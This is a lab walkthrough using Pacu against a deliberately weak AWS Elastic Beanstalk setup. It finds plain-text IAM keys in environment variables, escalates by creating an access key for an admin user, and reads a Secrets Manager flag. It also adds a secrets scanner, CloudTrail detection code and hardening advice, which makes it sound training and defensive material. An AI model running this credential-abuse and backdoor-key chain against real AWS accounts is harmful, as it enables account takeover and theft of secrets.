---
## Exploiting Elastic Beanstalk with Pacu (Lab Walkthrough)
> ⚠️ **Heads up:** Never ever paste real AWS keys in public. Seriously, don’t do it. In this lab walkthrough the keys you see are **dead, temporary, and masked** — so no worries here. Treat your _real_ keys like your toothbrush: don’t share them, don’t reuse them, and if they ever leak… replace them immediately.
---
## Creds
```bash
initial_low_priv_credentials = Access Key: AKIA************
Secret Key: ********************
```
---
## What is Beanstalk?
- It’s AWS’s “let me deploy code without crying over servers” service.
- Flow: **Upload Code → AWS spins up infra → App runs.**
- Very handy. Also, very abusable if misconfigured.
👉 [Full Blog on Pentesting Beanstalk w/ Pacu](https://rhinosecuritylabs.com/tools/new-pacu-module-enumerating-elastic-beanstalk/)
---
## Add Credentials
```bash
$ aws configure --profile beanstalk
AWS Access Key ID [None]: AKIA************
AWS Secret Access Key [None]: ********************
Default region name [None]: us-east-1
Default output format [None]: json
```
---
## Check the user
```bash
$ aws sts get-caller-identity --profile beanstalk
{
    "UserId": "AIDA5CBDQ6MGBRDA2DRUL",
    "Account": "123456789012",
    "Arn": "arn:aws:iam::123456789012:user/cgidd21ksoxwkz_low_priv_user"
}
```
---
## Fire up Pacu
```bash
$ pacu
# ...
Choose an option: 0
What would you like to name this new session? beanstalk
Session beanstalk created.
```
ASCII art included because hacking without ASCII art just feels wrong.
---
## Import Keys
```bash
Pacu (beanstalk:No Keys Set) > import_keys beanstalk
Imported keys as "imported-beanstalk"
```
---
## Search for Beanstalk Module
```bash
Pacu (beanstalk:imported-beanstalk) > search beanstalk
```
Output:
```
[Category: ENUM]
Enumerates Elastic Beanstalk applications, environments, checks for secrets.
elasticbeanstalk__enum
```
---
## Learn more about the module
```bash
Pacu (beanstalk:imported-beanstalk) > help elasticbeanstalk__enum
```
You’ll see usage flags for enumerating apps, envs, configs, tags, or downloading source code.
---
## Run it on our region
```bash
Pacu (beanstalk:imported-beanstalk) > run elasticbeanstalk__enum --region us-east-1
```
Sample output (trimmed for sanity):
```
[elasticbeanstalk__enum] 1 application(s) found in us-east-1.
[elasticbeanstalk__enum] 1 environment(s) found in us-east-1.
Potential secret in environment variable: SSHSourceRestriction => tcp,22,22,0.0.0.0/0
Potential secret in environment variable: EnvironmentVariables => SECONDARY_SECRET_KEY=********************,SECONDARY_ACCESS_KEY=AKIA************
```
Two different findings here. `EnvironmentVariables` carries a second, long-lived IAM key pair in plain text, which is the real prize. `SSHSourceRestriction => tcp,22,22,0.0.0.0/0` is not a secret at all despite the label: it is the launch-configuration option that opens port 22 on the environment's instances to the whole internet, a misconfiguration worth writing up on its own.
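Both findings above come from pattern-matching the environment's option settings. As an added example (not Pacu's module code and not part of the original walkthrough), here is the same check in plain Python over the JSON that `aws elasticbeanstalk describe-configuration-settings` returns, with a hardened set of settings beside the weak one so you can see what a clean scan looks like. The option namespaces are the ones the Elastic Beanstalk API uses for environment variables, the CloudFormation template parameter and the launch configuration; the sample settings, the instance-profile name and the Secrets Manager ARN are constructed, and the key pair in the weak set is the placeholder from AWS's own documentation.

```python
"""Scan Elastic Beanstalk option settings for hard-coded credentials and
world-open SSH: the two checks behind the Pacu findings above.

Added example, not Pacu's or the walkthrough's code. Input shape follows the
`aws elasticbeanstalk describe-configuration-settings` response (OptionSettings
entries with Namespace / OptionName / Value). Sample settings are constructed.
"""
import json
import re

# An AWS access key ID is 20 chars: AKIA (long-lived) or ASIA (STS) + 16 of [A-Z0-9].
ACCESS_KEY_RE = re.compile(r"(?<![A-Z0-9])(?:AKIA|ASIA)[A-Z0-9]{16}(?![A-Z0-9])")
# Variable names that normally carry a secret. A value that is only an ARN
# (a pointer into Secrets Manager or SSM) is a reference, not a secret.
SECRET_NAME_RE = re.compile(r"SECRET_KEY|PASSWORD|PASSWD|TOKEN|API_KEY|PRIVATE_KEY", re.I)

ENV_NS = "aws:elasticbeanstalk:application:environment"  # one option per variable
CFN_NS = "aws:cloudformation:template:parameter"         # EnvironmentVariables as "K=V,K=V"
LAUNCH_NS = "aws:autoscaling:launchconfiguration"         # SSHSourceRestriction, IamInstanceProfile


def parse_kv_list(value):
    """Parse the 'K=V,K=V' string form of the EnvironmentVariables parameter."""
    pairs = {}
    for item in value.split(","):
        if "=" in item:
            key, val = item.split("=", 1)
            pairs[key.strip()] = val.strip()
    return pairs


def check_variable(name, value, where):
    """Findings for one environment variable; key IDs are masked in the message."""
    found = []
    for key_id in ACCESS_KEY_RE.findall(value):
        found.append(("HIGH", f"{where}: {name} contains access key ID {key_id[:4]}{'*' * 16}"))
    if SECRET_NAME_RE.search(name) and not value.startswith("arn:"):
        found.append(("HIGH", f"{where}: {name} is a plain-text secret"))
    return found


def scan_option_settings(option_settings):
    """Return [(severity, message), ...] for one environment's OptionSettings."""
    findings = []
    for opt in option_settings:
        ns, name = opt.get("Namespace", ""), opt.get("OptionName", "")
        value = opt.get("Value") or ""
        if ns == ENV_NS:
            findings += check_variable(name, value, "env var")
        elif ns == CFN_NS and name == "EnvironmentVariables":
            for key, val in parse_kv_list(value).items():
                findings += check_variable(key, val, "EnvironmentVariables")
        elif ns == LAUNCH_NS and name == "SSHSourceRestriction":
            # Value format: protocol,fromPort,toPort,cidr-or-security-group-id
            parts = value.split(",")
            if len(parts) == 4 and parts[3] in ("0.0.0.0/0", "::/0"):
                findings.append(("MEDIUM", f"SSH ({parts[1]}-{parts[2]}/{parts[0]}) open to {parts[3]}"))
    return findings


def scan_describe_output(json_text):
    """Scan raw JSON from `aws elasticbeanstalk describe-configuration-settings ...`."""
    doc = json.loads(json_text)
    return {cfg.get("EnvironmentName", "?"): scan_option_settings(cfg.get("OptionSettings", []))
            for cfg in doc.get("ConfigurationSettings", [])}


# Constructed: the weak environment from the walkthrough. The key pair is the
# placeholder from AWS documentation, not a live credential.
WEAK_SETTINGS = [
    {"Namespace": LAUNCH_NS, "OptionName": "SSHSourceRestriction", "Value": "tcp,22,22,0.0.0.0/0"},
    {"Namespace": CFN_NS, "OptionName": "EnvironmentVariables",
     "Value": "SECONDARY_SECRET_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY,"
              "SECONDARY_ACCESS_KEY=AKIAIOSFODNN7EXAMPLE"},
    {"Namespace": ENV_NS, "OptionName": "SECONDARY_ACCESS_KEY", "Value": "AKIAIOSFODNN7EXAMPLE"},
]

# Constructed: the same environment fixed. The instances get their permissions
# from an instance profile and the app receives only a reference to the secret.
HARDENED_SETTINGS = [
    {"Namespace": LAUNCH_NS, "OptionName": "SSHSourceRestriction", "Value": "tcp,22,22,10.0.0.0/8"},
    {"Namespace": LAUNCH_NS, "OptionName": "IamInstanceProfile", "Value": "aws-elasticbeanstalk-ec2-role"},
    {"Namespace": ENV_NS, "OptionName": "SECONDARY_SECRET_ARN",
     "Value": "arn:aws:secretsmanager:us-east-1:123456789012:secret:app/secondary-AbCdEf"},
]

if __name__ == "__main__":
    for label, settings in (("weak", WEAK_SETTINGS), ("hardened", HARDENED_SETTINGS)):
        results = scan_option_settings(settings)
        print(f"{label}: {len(results)} finding(s)")
        for severity, message in results:
            print(f"  [{severity}] {message}")
```

To run it against a real environment, save the output of `aws elasticbeanstalk describe-configuration-settings --application-name APP --environment-name ENV --profile beanstalk` and pass the text to `scan_describe_output`. The scanner deliberately masks the key ID it reports so the findings file does not become a second copy of the secret.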
---
## Secondary Keys Discovered
```bash
SECONDARY_ACCESS_KEY=AKIA************
SECONDARY_SECRET_KEY=********************
```
---
## Configure and enumerate them
```bash
$ aws configure --profile b-creds-2
AWS Access Key ID [None]: AKIA************
AWS Secret Access Key [None]: ********************
Default region name [None]: us-east-1
Default output format [None]: json
```
Check the user:
```bash
$ aws sts get-caller-identity --profile b-creds-2
{
    "UserId": "AIDA5CBDQ6MGHWTK5DRPT",
    "Account": "123456789012",
    "Arn": "arn:aws:iam::123456789012:user/cgidd21ksoxwkz_secondary_user"
}
```
---
## Import into Pacu
```bash
Pacu (beanstalk:imported-beanstalk) > import_keys b-creds-2
Imported keys as "imported-b-creds-2"
```
---
## Enumerate IAM permissions
```bash
Pacu (beanstalk:imported-b-creds-2) > run iam__enum_permissions
```
You’ll get a breakdown of permissions, some confirmed and a bunch unconfirmed. Pacu confirms a permission by reading it out of the user’s inline and attached policies (which itself needs `iam:Get*`/`iam:List*` on the user); anything it could not read from a policy stays unconfirmed, so don’t treat that list as exhaustive.
Check details:
```bash
Pacu (beanstalk:imported-b-creds-2) > whoami
```
Output shows the user, attached policy, and allowed IAM actions.
---
## Privilege Escalation Scan
```bash
Pacu (beanstalk:imported-b-creds-2) > run iam__privesc_scan --scan-only
```
Output example:
```
[iam__privesc_scan] Escalation methods for current user:
[iam__privesc_scan] POTENTIAL: AttachUserPolicy
[iam__privesc_scan] CONFIRMED: CreateAccessKey
```
---
## Elevate Privileges
```bash
Pacu (beanstalk:imported-b-creds-2) > run iam__privesc_scan --user-methods CreateAccessKey
```
Output (masked):
```
[iam__backdoor_users_keys] cgidd21ksoxwkz_admin_user
[iam__backdoor_users_keys] Access Key ID: AKIA************
[iam__backdoor_users_keys] Secret Key: ********************
```
Note the module name in the output: the `CreateAccessKey` method hands off to `iam__backdoor_users_keys`, which calls `iam:CreateAccessKey` against a target user (the admin here) and returns a brand-new key pair for that user. Two caveats: an IAM user can hold at most two access keys, so the call fails if the target is already at the limit, and the call lands in CloudTrail as a `CreateAccessKey` whose `userName` is not the caller. Delete this key when the lab is over.
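The flip side of the two Pacu steps above is what a defender sees. As an added example (not Pacu's or the walkthrough's code), here is detection logic over CloudTrail records for the backdoor key (`CreateAccessKey` where the target user is not the caller), for the policy and group attachments `iam__privesc_scan` reports as other methods, and for the burst of `AccessDenied` errors that `iam__enum_permissions` and `--scan-only` leave behind. The record layout follows the CloudTrail JSON schema; the records themselves are constructed, with the user names taken from the walkthrough.

```python
"""Detection for the privilege-escalation steps above, run over CloudTrail records:

  * CreateAccessKey whose target user is not the caller (exactly what
    iam__backdoor_users_keys does) and policy/group attachments by an IAM user
    (the other methods iam__privesc_scan reports);
  * a burst of AccessDenied errors from one principal on iam.amazonaws.com
    (the footprint iam__enum_permissions and --scan-only leave behind).

Added example, not Pacu's or the walkthrough's code. Record layout follows the
CloudTrail JSON schema (userIdentity, eventSource, eventName, requestParameters,
errorCode); the records below are constructed, with names from the walkthrough.
"""
import json
from collections import Counter

PRIVESC_EVENTS = {"AttachUserPolicy", "PutUserPolicy", "AddUserToGroup",
                  "AttachGroupPolicy", "PutGroupPolicy", "AttachRolePolicy"}
DENIED_THRESHOLD = 3  # Pacu's permission brute-forcing produces far more than this


def load_records(log_text):
    """CloudTrail log files are {"Records": [...]}; return the list."""
    return json.loads(log_text).get("Records", [])


def caller_name(record):
    identity = record.get("userIdentity") or {}
    return identity.get("userName") or identity.get("arn") or "unknown"


def detect(records):
    """Return a list of alert strings for the given CloudTrail records."""
    alerts = []
    denied = Counter()
    for rec in records:
        if rec.get("eventSource") != "iam.amazonaws.com":
            continue
        who = caller_name(rec)
        event = rec.get("eventName")
        params = rec.get("requestParameters") or {}
        if rec.get("errorCode") == "AccessDenied":
            denied[who] += 1
            continue
        if event == "CreateAccessKey":
            # No userName in the request means "a key for myself": routine rotation.
            target = params.get("userName") or who
            if target != who:
                alerts.append(f"BACKDOOR: {who} created an access key for {target}")
        elif event in PRIVESC_EVENTS and (rec.get("userIdentity") or {}).get("type") == "IAMUser":
            alerts.append(f"PRIVESC: {who} called {event} {json.dumps(params, sort_keys=True)}")
    for who, count in denied.items():
        if count >= DENIED_THRESHOLD:
            alerts.append(f"RECON: {who} got AccessDenied on {count} IAM calls")
    return alerts


def iam_record(event, user, **extra):
    """Build a constructed CloudTrail record for an IAM API call."""
    rec = {"eventSource": "iam.amazonaws.com", "eventName": event,
           "userIdentity": {"type": "IAMUser", "userName": user,
                            "arn": f"arn:aws:iam::123456789012:user/{user}"}}
    rec.update(extra)
    return rec


SECONDARY = "cgidd21ksoxwkz_secondary_user"
ADMIN = "cgidd21ksoxwkz_admin_user"

# Constructed records: the enumeration noise, the backdoor key, and two benign events.
SAMPLE_RECORDS = [
    iam_record("GetUserPolicy", SECONDARY, errorCode="AccessDenied"),
    iam_record("ListAttachedRolePolicies", SECONDARY, errorCode="AccessDenied"),
    iam_record("SimulatePrincipalPolicy", SECONDARY, errorCode="AccessDenied"),
    iam_record("CreateAccessKey", SECONDARY, requestParameters={"userName": ADMIN},
               responseElements={"accessKey": {"accessKeyId": "AKIA****************", "status": "Active"}}),
    iam_record("CreateAccessKey", "alice", requestParameters={"userName": "alice"}),  # self-rotation
    {"eventSource": "elasticbeanstalk.amazonaws.com", "eventName": "DescribeEnvironments",
     "userIdentity": {"type": "IAMUser", "userName": SECONDARY}},
]
SAMPLE_LOG_TEXT = json.dumps({"Records": SAMPLE_RECORDS})

if __name__ == "__main__":
    for alert in detect(load_records(SAMPLE_LOG_TEXT)):
        print(alert)
```

The `RECON` rule is the noisy one: legitimate tooling trips `AccessDenied` too, so in production key it on principals that should never touch IAM at all (an application user like the one whose keys sat in the Beanstalk environment) rather than on a bare count. Also remember that IAM is a global service, so these events land in the us-east-1 trail no matter which region you were enumerating.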
---
## Configure Admin Profile
```bash
$ aws configure --profile admin-bean
AWS Access Key ID [None]: AKIA************
AWS Secret Access Key [None]: ********************
Default region name [None]: us-east-1
Default output format [None]: json
```
---
## Import into Pacu
```bash
Pacu (beanstalk:imported-b-creds-2) > import_keys admin-bean
Imported keys as "imported-admin-bean"
```
---
## Secrets Manager Enumeration
```bash
Pacu (beanstalk:imported-admin-bean) > run secrets__enum --region us-east-1
```
Output:
```
[secrets__enum] Found secret: cgidd21ksoxwkz_final_flag
```
---
## Grab the Flag
```bash
$ cd ~/.local/share/pacu/beanstalk/downloads/secrets/secrets_manager/
$ cat secrets.txt
cgidd21ksoxwkz_final_flag:FLAG{D0nt_st0r3_s3cr3ts_in_b3@nsta1k!}
```
---
## Wrap-Up
- Beanstalk is easy to use… and easy to misconfigure.
- Environment variables (and the CloudFormation `EnvironmentVariables` parameter they show up in) are **not** a safe place for secrets. Give the instances an instance profile role and hand the app a Secrets Manager reference instead of a key pair.
- One leaked key pair was enough to reach a user with `iam:CreateAccessKey` on other users, and that single permission is a full account takeover. Least privilege means checking what a user can do to *other* principals, not just what it can read.
- Pacu makes enumeration and escalation super straightforward in labs, and every step it took here (the config-settings reads, the flood of denied IAM calls, `CreateAccessKey` against another user, the Secrets Manager read) is a CloudTrail event you can alert on.
- This walkthrough shows why **least privilege, secret managers, and monitoring** are non-negotiable in AWS.
- Lab hygiene: delete the access key you created on the admin user and tear the environment down when you’re done.